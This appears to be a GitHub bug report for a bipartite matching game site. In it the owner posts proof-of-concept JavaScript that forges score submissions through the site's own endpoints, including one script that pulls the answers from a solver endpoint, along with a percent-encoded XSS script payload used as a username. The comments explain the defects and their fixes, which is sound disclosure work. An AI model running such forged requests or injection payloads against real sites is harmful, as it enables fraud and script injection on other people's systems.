
(Completed). Weighted bipartite matching game web application.
http://game.yulonglong.com

Fix bug of user able to modify AJAX call to submit score (and XSS) #9

Open yulonglong opened 8 years ago

yulonglong commented 8 years ago
// Proof of concept attached to the issue: a score is submitted directly from the
// browser without playing the game. Neither request carries anything that ties the
// submission to a player beyond the `username` query parameter, so the server is
// trusting client-supplied identity and a client-supplied solution.
function solveFast() {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function() {
        // The generated graph is never read; the request is only issued so that a
        // generate call precedes the submit (presumably required server-side — confirm).
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var xmlhttp2 = new XMLHttpRequest();
            // Hard-coded graph id, solution and username in the query string. The
            // server-side remedy is to bind submissions to an authenticated session
            // and to verify the solution against the graph it actually generated.
            xmlhttp2.open("GET","matching.php?cmd=submit&graph_id=1&solution=[[0,1],[1,0]]&username=iampro");
            xmlhttp2.send();
        }
    };
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id=1",true);
    xmlhttp.send();

}
yulonglong commented 8 years ago

kester_game.txt

yulonglong commented 8 years ago
// Highest graph id the proof of concept walks (see solveFast's recursion guard).
var LAST_GRAPH = 9;
// Player name the forged submissions are credited to — the only identity the
// server receives, and entirely under the client's control.
var USERNAME = "iampro";

// Second iteration of the proof of concept: submits a caller-supplied solution for
// graph `id` under USERNAME, then moves on to the next graph via
// getSolutionAndSolve until LAST_GRAPH is reached.
//
// id   - graph id being submitted.
// soln - JSON string of the matching to submit (produced by getSolutionAndSolve).
//
// Nothing here is checked server-side against the player's session; the defect
// being reported is that `submit` accepts whatever solution and username it is
// given from an unauthenticated client.
function solveFast(id, soln) {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var xmlhttp2 = new XMLHttpRequest();
            xmlhttp2.onreadystatechange = function() {
                if (xmlhttp2.readyState == 4 && xmlhttp2.status == 200) {
                    // The submit response is only logged; the recursion continues
                    // regardless of its content.
                    var response = xmlhttp2.responseText;
                    console.log(id + ": " + response);
                    if (id < LAST_GRAPH) {
                        getSolutionAndSolve(id+1);
                    }
                }
            };
            // Solution and username travel as plain query parameters — the server
            // should recompute/verify the solution and take identity from the session.
            xmlhttp2.open("GET","matching.php?cmd=submit&graph_id="+id+"&solution="+soln+"&username="+USERNAME);
            xmlhttp2.send();
        }
    };
    // As in the first PoC, the generated graph is requested but its content is unused.
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id="+id,true);
    xmlhttp.send();

}

// Fetches graph `id`, asks the server's own `cmd=solve` endpoint for its matching,
// and hands the result to solveFast for submission.
//
// id - graph id to fetch and solve.
//
// Defensive takeaway: the server exposes a solver that returns the optimal
// matching ("match") for any client-supplied graph, so the answer key is
// available to the client. Either the solver should not be reachable from the
// client, or submissions must be validated independently of it.
function getSolutionAndSolve(id) {
    var solution;
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            // Raw JSON of the generated graph, forwarded verbatim to the solver.
            var graphJson = xmlhttp.responseText;
            var xmlhttp2 = new XMLHttpRequest();

            xmlhttp2.onreadystatechange = function() {
                if (xmlhttp2.readyState == 4 && xmlhttp2.status == 200) {
                    var solvedGraphJson = xmlhttp2.responseText;
                    var solvedGraphArray = JSON.parse(solvedGraphJson);
                    // Only the "match" field of the solver response is re-serialised
                    // and submitted.
                    solution = JSON.stringify(solvedGraphArray["match"]);
                    solveFast(id, solution);
                }
            };
            xmlhttp2.open("GET","matching.php?cmd=solve&graph="+graphJson,true);
            xmlhttp2.send();
        }
    };
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id="+id,true);
    xmlhttp.send();
}

// Entry point of the proof of concept: starts at graph 1 and, through the mutual
// recursion between getSolutionAndSolve and solveFast, proceeds up to LAST_GRAPH.
getSolutionAndSolve(1);
yulonglong commented 8 years ago

// Percent-encoded `<script>alert(12345);</script>` used as the username. The issue
// reports this as XSS, which implies the username is rendered somewhere without
// output encoding (confirm against the server-side templates). The fix is
// context-appropriate escaping wherever the value is written into a page, plus
// server-side validation of the username format.
var USERNAME = "%3Cscript%3Ealert%2812345%29%3B%3C%2Fscript%3E";

XSS is also possible